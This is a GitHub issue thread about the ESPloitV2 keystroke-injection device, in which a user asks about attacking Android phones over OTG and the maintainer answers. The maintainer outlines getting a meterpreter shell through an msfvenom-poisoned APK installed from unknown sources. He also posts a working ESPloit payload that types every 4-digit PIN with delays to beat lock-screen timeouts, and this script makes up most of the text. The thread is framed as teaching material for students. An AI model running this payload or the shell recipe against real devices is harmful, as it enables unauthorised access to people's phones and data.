exploitagency/ESPloitV2 #16: Question & Request : Android Attacks

ChandraOrbit, 2017-12-16:
If ESploit I connect with OTG cable.
1. Does ESploit support attacks on android smartphone like HID-IRON?
2. If support, is there a payload example?

Thank You

exploitagency, 2017-12-16:
There is actually a pin brute force script as an easter egg in the duckuino mode.

It is documented in the readme here https://github.com/exploitagency/Duckuino/blob/master/README.md

But not in ESPloit

exploitagency, 2018-01-25:
Pseudo Ducky Script commands exclusively for Duckuino ESPloit
PINBRUTE [#_OF_DIGITS] [#_OF_ATTEMPTS_BEFORE_A_DELAY] [DELAY_IN_MILLISECONDS]
Arguments [#_OF_ATTEMPTS_BEFORE_A_DELAY] & [DELAY_IN_MILLISECONDS] are optional.
Example code:

DEFAULTDELAY 500
PINBRUTE 4 5 30000
-Sets the default delay to 500ms between attempting each pin.
-Tries all 4 digit pins from 0000-9999.
-After 5 pin attempts there is a 30 second delay(30,000 milliseconds).

ChandraOrbit, 2018-01-25:
I bought 50 units of ESPloit for my students.
Only 1 question from those I can not answer about the implementation of ESPloit to Smarphone especially android.

ie information about referrals and payload samples that are loaded on google. Because in general the target Payload is Computer (Windows, Mac and Linux)

Thanks

exploitagency, 2018-01-25:
I feel like I answered this.  Lock the screen with a pin code and use the pin brute feature I added to duckuino mode.  Thats a good but slow demo(limited by android pin attempt timeouts) so choose a pin close to the start point.

As far as android payloads, sure there are not many out there.  You can write one to allow install from trusted sources, then download a msvenom poisoned apk file and get a meterpreter shell.  No I will not write it for you, phones and tablets vary drastically one reason I don't have examples.

The bottom line is don't be afraid to learn the scripting language and write your own payloads.  You can even write your payload using ducky script if that makes you more comfortable and then use the conversion tool to convert it to an ESPloit payload.

exploitagency, 2018-01-25:
4 digit Pin Brute Force
'''
Rem:Generated by Dckuino.js by NURRL
Rem:Modified for use with ESPloit by Corey Harding
Rem:-----
DefaultDelay:500
PrintLine:0000
PrintLine:0001
PrintLine:0002
PrintLine:0003
PrintLine:0004
CustomDelay:30000
PrintLine:0005
PrintLine:0006
PrintLine:0007
PrintLine:0008
PrintLine:0009
CustomDelay:30000
PrintLine:0010
PrintLine:0011
PrintLine:0012
PrintLine:0013
PrintLine:0014
CustomDelay:30000
PrintLine:0015
PrintLine:0016
PrintLine:0017
PrintLine:0018
PrintLine:0019
CustomDelay:30000
PrintLine:0020
PrintLine:0021
PrintLine:0022
PrintLine:0023
PrintLine:0024
CustomDelay:30000
PrintLine:0025
PrintLine:0026
PrintLine:0027
PrintLine:0028
PrintLine:0029
CustomDelay:30000
PrintLine:0030
PrintLine:0031
PrintLine:0032
PrintLine:0033
PrintLine:0034
CustomDelay:30000
PrintLine:0035
PrintLine:0036
PrintLine:0037
PrintLine:0038
PrintLine:0039
CustomDelay:30000
PrintLine:0040
PrintLine:0041
PrintLine:0042
PrintLine:0043
PrintLine:0044
CustomDelay:30000
PrintLine:0045
PrintLine:0046
PrintLine:0047
PrintLine:0048
PrintLine:0049
CustomDelay:30000
PrintLine:0050
PrintLine:0051
PrintLine:0052
PrintLine:0053
[... 11911 lines cut ...]
CustomDelay:30000
PrintLine:9980
PrintLine:9981
PrintLine:9982
PrintLine:9983
PrintLine:9984
CustomDelay:30000
PrintLine:9985
PrintLine:9986
PrintLine:9987
PrintLine:9988
PrintLine:9989
CustomDelay:30000
PrintLine:9990
PrintLine:9991
PrintLine:9992
PrintLine:9993
PrintLine:9994
CustomDelay:30000
PrintLine:9995
PrintLine:9996
PrintLine:9997
PrintLine:9998
PrintLine:9999
'''

ChandraOrbit, 2018-01-26:
OK thank you, I will study again and try what you convey

exploitagency, 2018-01-26:
If you give me more information I can be a little more helpful but I feel I have certainly covered the pin attack with the pinbrute function of duckuino for ESPloit.

closed 2018-01-26 by exploitagency